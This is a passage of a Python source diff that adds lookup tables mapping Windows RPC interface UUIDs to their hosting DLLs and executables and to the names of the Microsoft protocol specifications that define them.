+b"\x36\x00\x61\x20\x22\xfa\xcf\x11\x98\x23\x00\xa0\xc9\x11\xe5\xdf\x01\x00": "rasmans.dll",
+b"\x70\x0d\xec\xec\x03\xa6\xd0\x11\x96\xb1\x00\xa0\xc9\x1e\xce\x30\x01\x00": "ntdsbsrv.dll",
+b"\x1c\xef\x74\x0a\xa4\x41\x06\x4e\x83\xae\xdc\x74\xfb\x1c\xdd\x53\x01\x00": "schedsvc.dll",
+b"\x25\x04\x49\xdd\x25\x53\x65\x45\xb7\x74\x7e\x27\xd6\xc0\x9c\x24\x01\x00": "BFE.DLL",
+b"\x7c\x5a\xcc\xf5\x64\x42\x1a\x10\x8c\x59\x08\x00\x2b\x2f\x84\x26\x15\x00": "ntdsa.dll",
+b"\xa0\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46\x00\x00": "rpcss.dll",
+b"\x49\x59\xd3\x86\xc9\x83\x44\x40\xb4\x24\xdb\x36\x32\x31\xfd\x0c\x01\x00": "schedsvc.dll",
+b"\x35\x08\x22\x11\x26\x5b\x94\x4d\xae\x86\xc3\xe4\x75\xa8\x09\xde\x01\x00": "lsasrv.dll",
+b"\xa8\x66\x00\xc8\x79\x75\xfc\x44\xb9\xb2\x84\x66\x93\x07\x91\xb0\x01\x00": "umrdp.dll",
+b"\xab\x59\xec\xf1\xa9\x4c\x30\x4c\xb2\xd0\x54\xef\x1d\xb4\x41\xb7\x01\x00": "iertutil.dll",
+b"\xba\xaa\x67\x52\x49\x4f\x53\x46\x8e\x26\xd1\xe1\x1f\x3f\x2a\xd9\x01\x00": "termsrv.dll",
+b"\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\x69\x01\x29\x3f\x00\x00": "rpcss.dll",
+b"\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\x69\x01\x29\x3f\x00\x02": "rpcss.dll",
+b"\x38\x47\xaf\x3f\x21\x3a\x07\x43\xb4\x6c\xfd\xda\x9b\xb8\xc0\xd5\x01\x02": "audiosrv.dll",
+b"\x38\x47\xaf\x3f\x21\x3a\x07\x43\xb4\x6c\xfd\xda\x9b\xb8\xc0\xd5\x01\x01": "audiosrv.dll",
+b"\x20\x32\x5f\x2f\x26\xc1\x76\x10\xb5\x49\x07\x4d\x07\x86\x19\xda\x01\x02": "netdde.exe",
+b"\xbf\x11\x9d\x7f\xb9\x7f\x6b\x43\xa8\x12\xb2\xd5\x0c\x5d\x4c\x03\x01\x00": "MPSSVC.dll",
+b"\xbf\x52\x5a\xb2\xdd\xe5\x4a\x4f\xae\xa6\x8c\xa7\x27\x2a\x0e\x86\x01\x00": "keyiso.dll",
+b"\x04\x22\x11\x4b\x19\x0e\xd3\x11\xb4\x2b\x00\x00\xf8\x1f\xeb\x9f\x01\x00": "ssdpsrv.dll",
+b"\x97\xb2\xee\x04\xf4\xcb\x6b\x46\x8a\x2a\xbf\xd6\xa2\xf1\x0b\xba\x01\x00": "efssvc.dll",
+b"\x40\xb2\x9b\x20\x19\xb9\xd1\x11\xbb\xb6\x00\x80\xc7\x5e\x4e\xc1\x01\x00": "irmon.dll",
+b"\x96\x3f\xf0\x76\xfd\xcd\xfc\x44\xa2\x2c\x64\x95\x0a\x00\x12\x09\x01\x00": "spoolsv.exe",
+b"\x4a\xa5\xbb\x06\x05\xbe\xf9\x49\xb0\xa0\x30\xf7\x90\x26\x10\x23\x01\x00": "wscsvc.dll",
+b"\xa6\xb2\xdd\x1b\xc3\xc0\xbe\x41\x87\x03\xdd\xbd\xf4\xf0\xe8\x0a\x01\x00": "dot3svc.dll",
+b"\x82\x15\x41\xaa\xdf\x9b\xfb\x48\xb4\x2b\xfa\xa1\xee\xe3\x39\x49\x01\x00": "nlasvc.dll",
+b"\xfa\x9d\xd7\xd2\x00\x34\xd0\x11\xb4\x0b\x00\xaa\x00\x5f\xf5\x86\x01\x00": "dmadmin.exe",
+b"\x12\xfc\x99\x60\xff\x3e\xd0\x11\xab\xd0\x00\xc0\x4f\xd9\x1a\x4e\x03\x00": "FXSAPI.dll",
+b"\x1e\x24\x2f\x41\x2a\xc1\xce\x11\xab\xff\x00\x20\xaf\x6e\x7a\x17\x00\x00": "rpcss.dll",
+b"\xd5\x33\x9a\x2c\xdb\xf1\x2d\x47\x84\x64\x42\xb8\xb0\xc7\x6c\x38\x01\x00": "tbssvc.dll",
+b"\x30\x7c\xde\x3d\x5d\x16\xd1\x11\xab\x8f\x00\x80\x5f\x14\xdb\x40\x01\x00": "services.exe",
+b"\x86\xb1\x49\xd0\x4f\x81\xd1\x11\x9a\x3c\x00\xc0\x4f\xc9\xb2\x32\x01\x01": "ntfrs.exe",
+b"\x94\x8c\x95\x95\x24\xa4\x55\x40\xb6\x2b\xb7\xf4\xd5\xc4\x77\x70\x01\x00": "winlogon.exe",
+b"\xe3\x31\x67\x32\xc0\xc1\x69\x4a\xae\x20\x7d\x90\x44\xa4\xea\x5c\x01\x00": "profsvc.dll",
+b"\x18\x5a\xcc\xf5\x64\x42\x1a\x10\x8c\x59\x08\x00\x2b\x2f\x84\x26\x38\x00": "ntdsai.dll",
+b"\x0f\x6a\xe9\x4b\x52\x9f\x29\x47\xa5\x1d\xc7\x06\x10\xf1\x18\xb0\x01\x00": "wbiosrvc.dll",
+b"\x80\x42\xad\x82\x6b\x03\xcf\x11\x97\x2c\x00\xaa\x00\x68\x87\xb0\x02\x00": "infocomm.dll",
+b"\x87\x04\x26\x1f\x29\xba\x13\x4f\x92\x8a\xbb\xd2\x97\x61\xb0\x83\x01\x00": "termsrv.dll",
+b"\x70\x07\xf7\x18\x64\x8e\xcf\x11\x9a\xf1\x00\x20\xaf\x6e\x72\xf4\x00\x00": "ole32.dll",
+b"\xc0\xeb\x4f\xfa\x91\x45\xce\x11\x95\xe5\x00\xaa\x00\x51\xe5\x10\x04\x00": "autmgr32.exe",
+b"\x10\xca\x8c\x70\x69\x95\xd1\x11\xb2\xa5\x00\x60\x97\x7d\x81\x18\x01\x00": "mqdssrv.dll",
+b"\x28\x2c\xf5\x45\x9f\x7f\x1a\x10\xb5\x2b\x08\x00\x2b\x2e\xfa\xbe\x01\x00": "WINS.EXE",
+b"\x31\xa3\x59\x2f\x7d\xbf\xcb\x48\x9e\x5c\x7c\x09\x0d\x76\xe8\xb8\x01\x00": "termsrv.dll",
+b"\x61\x26\x45\x4a\x90\x82\x36\x4b\x8f\xbe\x7f\x40\x93\xa9\x49\x78\x01\x00": "spoolsv.exe",
+}
+
+KNOWN_PROTOCOLS = {
+'52C80B95-C1AD-4240-8D89-72E9FA84025E':'[MC-CCFG]: Server Cluster:',
+'FA7660F6-7B3F-4237-A8BF-ED0AD0DCBBD9':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'450386DB-7409-4667-935E-384DBBEE2A9E':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'832A32F7-B3EA-4B8C-B260-9A2923001184':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'2D9915FB-9D42-4328-B782-1B46819FAB9E':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'0DD8A158-EBE6-4008-A1D9-B7ECC8F1104B':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'0716CAF8-7D05-4A46-8099-77594BE91394':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'B80F3C42-60E0-4AE0-9007-F52852D3DBED':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'0344CDDA-151E-4CBF-82DA-66AE61E97754':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'8BED2C68-A5FB-4B28-8581-A0DC5267419F':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'7883CA1C-1112-4447-84C3-52FBEB38069D':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'09829352-87C2-418D-8D79-4133969A489D':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'5B5A68E6-8B9F-45E1-8199-A95FFCCDFFFF':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'9BE77978-73ED-4A9A-87FD-13F09FEC1B13':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'ED35F7A1-5024-4E7B-A44D-07DDAF4B524D':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'4DFA1DF3-8900-4BC7-BBB5-D1A458C52410':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'370AF178-7758-4DAD-8146-7391F6E18585':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'C8550BFF-5281-4B1E-AC34-99B6FA38464D':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'08A90F5F-0702-48D6-B45F-02A9885A9768':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'8F6D760F-F0CB-4D69-B5F6-848B33E9BDC6':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'E7927575-5CC3-403B-822E-328A6B904BEE':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'DE095DB1-5368-4D11-81F6-EFEF619B7BCF':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'64FF8CCC-B287-4DAE-B08A-A72CBF45F453':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'EAFE4895-A929-41EA-B14D-613E23F62B71':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'EF13D885-642C-4709-99EC-B89561C6BC69':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'0191775E-BCFF-445A-B4F4-3BDDA54E2816':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'31A83EA0-C0E4-4A2C-8A01-353CC2A4C60A':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'D6C7CD8F-BB8D-4F96-B591-D3A5F1320269':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'ADA4E6FB-E025-401E-A5D0-C3134A281F07':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'B7D381EE-8860-47A1-8AF4-1F33B2B1F325':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'C5C04795-321C-4014-8FD6-D44658799393':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',
+'EBA96B22-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'12A30900-7300-11D2-B0E6-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B24-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'2CE0C5B0-6E67-11D2-B0E6-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B0E-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'B196B285-BAB4-101A-B69C-00AA00341D07':'[MC-MQAC]: Message Queuing (MSMQ):',
+'39CE96FE-F4C5-4484-A143-4C2D5D324229':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E07F-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B1A-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B18-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B23-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B14-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'FD174A80-89CF-11D2-B0F2-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'F72B9031-2F0C-43E8-924E-E6052CDC493F':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E072-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E075-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'0188401C-247A-4FED-99C6-BF14119D7055':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B15-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E07C-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'BE5F0241-E489-4957-8CC4-A452FCF3E23E':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B1C-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E077-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E078-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'B196B284-BAB4-101A-B69C-00AA00341D07':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E073-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E07D-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B1B-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E079-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E084-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B1F-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'33B6D07E-F27D-42FA-B2D7-BF82E11E9374':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E07A-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'0188AC2F-ECB3-4173-9779-635CA2039C72':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E085-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EF0574E0-06D8-11D3-B100-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E086-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'B196B286-BAB4-101A-B69C-00AA00341D07':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D9933BE0-A567-11D2-B0F3-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7AB3341-C9D3-11D1-BB47-0080C7C5A2C0':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E082-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'0FB15084-AF41-11CE-BD2B-204C4F4F5020':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E083-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B13-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B1D-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B17-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B20-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E074-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'7FBE7759-5760-444D-B8A5-5E7AB9A84CCE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'B196B287-BAB4-101A-B69C-00AA00341D07':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B12-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B1E-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E07E-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E081-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E07B-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'64C478FB-F9B0-4695-8A7F-439AC94326D3':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B16-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B19-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B10-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B21-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E076-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B0F-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'EBA96B11-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',
+'D7D6E080-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',
+'4639DB2A-BFC5-11D2-9318-00C04FBBBFB3':'[MS-ADTG]: Remote Data Services (RDS) Transport Protocol',
+'0EAC4842-8763-11CF-A743-00AA00A3F00D':'[MS-ADTG]: Remote Data Services (RDS) Transport Protocol',
+'070669EB-B52F-11D1-9270-00C04FBBBFB3':'[MS-ADTG]: Remote Data Services (RDS) Transport Protocol',
+'3DDE7C30-165D-11D1-AB8F-00805F14DB40':'[MS-BKRP]: BackupKey Remote Protocol',
+'E3D0D746-D2AF-40FD-8A7A-0D7078BB7092':'[MS-BPAU]: Background Intelligent Transfer Service (BITS) Peer-',
+'6BFFD098-A112-3610-9833-012892020162':'[MS-BRWSA]: Common Internet File System (CIFS) Browser Auxiliary',
+'AFC07E2E-311C-4435-808C-C483FFEEC7C9':'[MS-CAPR]: Central Access Policy Identifier (ID) Retrieval Protocol',
+'B97DB8B2-4C63-11CF-BFF6-08002BE23F2F':'[MS-CMRP]: Failover Cluster:',
+'97199110-DB2E-11D1-A251-0000F805CA53':'[MS-COM]: Component Object Model Plus (COM+) Protocol',
+'0E3D6630-B46B-11D1-9D2D-006008B0E5CA':'[MS-COMA]: Component Object Model Plus (COM+) Remote',
+'3F3B1B86-DBBE-11D1-9DA6-00805F85CFE3':'[MS-COMA]: Component Object Model Plus (COM+) Remote',
+'7F43B400-1A0E-4D57-BBC9-6B0C65F7A889':'[MS-COMA]: Component Object Model Plus (COM+) Remote',
+'456129E2-1078-11D2-B0F9-00805FC73204':'[MS-COMA]: Component Object Model Plus (COM+) Remote',
+'8DB2180E-BD29-11D1-8B7E-00C04FD7A924':'[MS-COMA]: Component Object Model Plus (COM+) Remote',
+'182C40FA-32E4-11D0-818B-00A0C9231C29':'[MS-COMA]: Component Object Model Plus (COM+) Remote',
+'971668DC-C3FE-4EA1-9643-0C7230F494A1':'[MS-COMA]: Component Object Model Plus (COM+) Remote',
+'98315903-7BE5-11D2-ADC1-00A02463D6E7':'[MS-COMA]: Component Object Model Plus (COM+) Remote',
+'6C935649-30A6-4211-8687-C4C83E5FE1C7':'[MS-COMA]: Component Object Model Plus (COM+) Remote',
+'F131EA3E-B7BE-480E-A60D-51CB2785779E':'[MS-COMA]: Component Object Model Plus (COM+) Remote',
+'1F7B1697-ECB2-4CBB-8A0E-75C427F4A6F0':'[MS-COMA]: Component Object Model Plus (COM+) Remote',
+'A8927A41-D3CE-11D1-8472-006008B0E5CA':'[MS-COMA]: Component Object Model Plus (COM+) Remote',
+'CFADAC84-E12C-11D1-B34C-00C04F990D54':'[MS-COMA]: Component Object Model Plus (COM+) Remote',
+'1D118904-94B3-4A64-9FA6-ED432666A7B9':'[MS-COMA]: Component Object Model Plus (COM+) Remote',
+'47CDE9A1-0BF6-11D2-8016-00C04FB9988E':'[MS-COMA]: Component Object Model Plus (COM+) Remote',
+'0E3D6631-B46B-11D1-9D2D-006008B0E5CA':'[MS-COMA]: Component Object Model Plus (COM+) Remote',
+'C2BE6970-DF9E-11D1-8B87-00C04FD7A924':'[MS-COMA]: Component Object Model Plus (COM+) Remote',
+'C726744E-5735-4F08-8286-C510EE638FB6':'[MS-COMA]: Component Object Model Plus (COM+) Remote',
+'FBC1D17D-C498-43A0-81AF-423DDD530AF6':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',
+'F89AC270-D4EB-11D1-B682-00805FC79216':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',
+'FB2B72A1-7A68-11D1-88F9-0080C7D771BF':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',
+'4E14FB9F-2E22-11D1-9964-00C04FBBB345':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',
+'A0E8F27A-888C-11D1-B763-00C04FB926AF':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',
+'7FB7EA43-2D76-4EA8-8CD9-3DECC270295E':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',
+'99CC098F-A48A-4E9C-8E58-965C0AFC19D5':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',
+'FB2B72A0-7A68-11D1-88F9-0080C7D771BF':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',
+'4A6B0E16-2E38-11D1-9965-00C04FBBB345':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',
+'F4A07D63-2E25-11D1-9964-00C04FBBB345':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',
+'4A6B0E15-2E38-11D1-9965-00C04FBBB345':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',
+'B60040E0-BCF3-11D1-861D-0080C729264D':'[MS-COMT]: Component Object Model Plus (COM+) Tracker Service',
+'23C9DD26-2355-4FE2-84DE-F779A238ADBD':'[MS-COMT]: Component Object Model Plus (COM+) Tracker Service',
+'4E6CDCC9-FB25-4FD5-9CC5-C9F4B6559CEC':'[MS-COMT]: Component Object Model Plus (COM+) Tracker Service',
+'D99E6E71-FC88-11D0-B498-00A0C90312F3':'[MS-CSRA]: Certificate Services Remote Administration Protocol',
+'7FE0D935-DDA6-443F-85D0-1CFB58FE41DD':'[MS-CSRA]: Certificate Services Remote Administration Protocol',
+'E1568352-586D-43E4-933F-8E6DC4DE317A':'[MS-CSVP]: Failover Cluster:',
+'11942D87-A1DE-4E7F-83FB-A840D9C5928D':'[MS-CSVP]: Failover Cluster:',
+'491260B5-05C9-40D9-B7F2-1F7BDAE0927F':'[MS-CSVP]: Failover Cluster:',
+'C72B09DB-4D53-4F41-8DCC-2D752AB56F7C':'[MS-CSVP]: Failover Cluster:',
+'E3C9B851-C442-432B-8FC6-A7FAAFC09D3B':'[MS-CSVP]: Failover Cluster:',
+'4142DD5D-3472-4370-8641-DE7856431FB0':'[MS-CSVP]: Failover Cluster:',
+'D6105110-8917-41A5-AA32-8E0AA2933DC9':'[MS-CSVP]: Failover Cluster:',
+'A6D3E32B-9814-4409-8DE3-CFA673E6D3DE':'[MS-CSVP]: Failover Cluster:',
+'04D55210-B6AC-4248-9E69-2A569D1D2AB6':'[MS-CSVP]: Failover Cluster:',
+'2931C32C-F731-4C56-9FEB-3D5F1C5E72BF':'[MS-CSVP]: Failover Cluster:',
+'12108A88-6858-4467-B92F-E6CF4568DFB6':'[MS-CSVP]: Failover Cluster:',
+'85923CA7-1B6B-4E83-A2E4-F5BA3BFBB8A3':'[MS-CSVP]: Failover Cluster:',
+'F1D6C29C-8FBE-4691-8724-F6D8DEAEAFC8':'[MS-CSVP]: Failover Cluster:',
+'3CFEE98C-FB4B-44C6-BD98-A1DB14ABCA3F':'[MS-CSVP]: Failover Cluster:',
+'88E7AC6D-C561-4F03-9A60-39DD768F867D':'[MS-CSVP]: Failover Cluster:',
+'00000131-0000-0000-C000-000000000046':'[MS-DCOM]: Distributed Component Object Model (DCOM) Remote',
+'4D9F4AB8-7D1C-11CF-861E-0020AF6E7C57':'[MS-DCOM]: Distributed Component Object Model (DCOM) Remote',
+'00000143-0000-0000-C000-000000000046':'[MS-DCOM]: Distributed Component Object Model (DCOM) Remote',
+'000001A0-0000-0000-C000-000000000046':'[MS-DCOM]: Distributed Component Object Model (DCOM) Remote',
+'99FCFEC4-5260-101B-BBCB-00AA0021347A':'[MS-DCOM]: Distributed Component Object Model (DCOM) Remote',
+'00000000-0000-0000-C000-000000000046':'[MS-DCOM]: Distributed Component Object Model (DCOM) Remote',
+'4FC742E0-4A10-11CF-8273-00AA004AE673':'[MS-DFSNM]: Distributed File System (DFS):',
+'9009D654-250B-4E0D-9AB0-ACB63134F69F':'[MS-DFSRH]: DFS Replication Helper Protocol',
+'E65E8028-83E8-491B-9AF7-AAF6BD51A0CE':'[MS-DFSRH]: DFS Replication Helper Protocol',
+'D3766938-9FB7-4392-AF2F-2CE8749DBBD0':'[MS-DFSRH]: DFS Replication Helper Protocol',
+'4BB8AB1D-9EF9-4100-8EB6-DD4B4E418B72':'[MS-DFSRH]: DFS Replication Helper Protocol',
+'CEB5D7B4-3964-4F71-AC17-4BF57A379D87':'[MS-DFSRH]: DFS Replication Helper Protocol',
+'7A2323C7-9EBE-494A-A33C-3CC329A18E1D':'[MS-DFSRH]: DFS Replication Helper Protocol',
+'20D15747-6C48-4254-A358-65039FD8C63C':'[MS-DFSRH]: DFS Replication Helper Protocol',
+'C4B0C7D9-ABE0-4733-A1E1-9FDEDF260C7A':'[MS-DFSRH]: DFS Replication Helper Protocol',
+'6BFFD098-A112-3610-9833-46C3F874532D':'[MS-DHCPM]: Microsoft Dynamic Host Configuration Protocol (DHCP)',
+'5B821720-F63B-11D0-AAD2-00C04FC324DB':'[MS-DHCPM]: Microsoft Dynamic Host Configuration Protocol (DHCP)',
+'4DA1C422-943D-11D1-ACAE-00C04FC2AA3F':'[MS-DLTM]: Distributed Link Tracking:',
+'300F3532-38CC-11D0-A3F0-0020AF6B0ADD':'[MS-DLTW]: Distributed Link Tracking:',
+'D2D79DF5-3400-11D0-B40B-00AA005FF586':'[MS-DMRP]: Disk Management Remote Protocol',
+'DEB01010-3A37-4D26-99DF-E2BB6AE3AC61':'[MS-DMRP]: Disk Management Remote Protocol',
+'3A410F21-553F-11D1-8E5E-00A0C92C9D5D':'[MS-DMRP]: Disk Management Remote Protocol',
+'D2D79DF7-3400-11D0-B40B-00AA005FF586':'[MS-DMRP]: Disk Management Remote Protocol',
+'4BDAFC52-FE6A-11D2-93F8-00105A11164A':'[MS-DMRP]: Disk Management Remote Protocol',
+'135698D2-3A37-4D26-99DF-E2BB6AE3AC61':'[MS-DMRP]: Disk Management Remote Protocol',
+'50ABC2A4-574D-40B3-9D66-EE4FD5FBA076':'[MS-DNSP]: Domain Name Service (DNS) Server Management',
+'7C44D7D4-31D5-424C-BD5E-2B3E1F323D22':'[MS-DRSR]: Directory Replication Service (DRS) Remote Protocol',
+'3919286A-B10C-11D0-9BA8-00C04FD92EF5':'[MS-DSSP]: Directory Services Setup Remote Protocol',
+'14A8831C-BC82-11D2-8A64-0008C7457E5D':'[MS-EERR]: ExtendedError Remote Data Structure',
+'C681D488-D850-11D0-8C52-00C04FD90F7E':'[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol',
+'82273FDC-E32A-18C3-3F78-827929DC23EA':'[MS-EVEN]: EventLog Remoting Protocol',
+'6B5BDD1E-528C-422C-AF8C-A4079BE4FE48':'[MS-FASP]: Firewall and Advanced Security Protocol',
+'6099FC12-3EFF-11D0-ABD0-00C04FD91A4E':'[MS-FAX]: Fax Server and Client Remote Protocol',
+'EA0A3165-4834-11D2-A6F8-00C04FA346CC':'[MS-FAX]: Fax Server and Client Remote Protocol',
+'897E2E5F-93F3-4376-9C9C-FD2277495C27':'[MS-FRS2]: Distributed File System Replication Protocol',
+'377F739D-9647-4B8E-97D2-5FFCE6D759CD':'[MS-FSRM]: File Server Resource Manager Protocol',
+'F411D4FD-14BE-4260-8C40-03B7C95E608A':'[MS-FSRM]: File Server Resource Manager Protocol',
+'4C8F96C3-5D94-4F37-A4F4-F56AB463546F':'[MS-FSRM]: File Server Resource Manager Protocol',
+'CFE36CBA-1949-4E74-A14F-F1D580CEAF13':'[MS-FSRM]: File Server Resource Manager Protocol',
+'8276702F-2532-4839-89BF-4872609A2EA4':'[MS-FSRM]: File Server Resource Manager Protocol',
+'4A73FEE4-4102-4FCC-9FFB-38614F9EE768':'[MS-FSRM]: File Server Resource Manager Protocol',
+'F3637E80-5B22-4A2B-A637-BBB642B41CFC':'[MS-FSRM]: File Server Resource Manager Protocol',
+'1568A795-3924-4118-B74B-68D8F0FA5DAF':'[MS-FSRM]: File Server Resource Manager Protocol',
+'6F4DBFFF-6920-4821-A6C3-B7E94C1FD60C':'[MS-FSRM]: File Server Resource Manager Protocol',
+'39322A2D-38EE-4D0D-8095-421A80849A82':'[MS-FSRM]: File Server Resource Manager Protocol',
+'326AF66F-2AC0-4F68-BF8C-4759F054FA29':'[MS-FSRM]: File Server Resource Manager Protocol',
+'27B899FE-6FFA-4481-A184-D3DAADE8A02B':'[MS-FSRM]: File Server Resource Manager Protocol',
+'E1010359-3E5D-4ECD-9FE4-EF48622FDF30':'[MS-FSRM]: File Server Resource Manager Protocol',
+'8DD04909-0E34-4D55-AFAA-89E1F1A1BBB9':'[MS-FSRM]: File Server Resource Manager Protocol',
+'96DEB3B5-8B91-4A2A-9D93-80A35D8AA847':'[MS-FSRM]: File Server Resource Manager Protocol',
+'D8CC81D9-46B8-4FA4-BFA5-4AA9DEC9B638':'[MS-FSRM]: File Server Resource Manager Protocol',
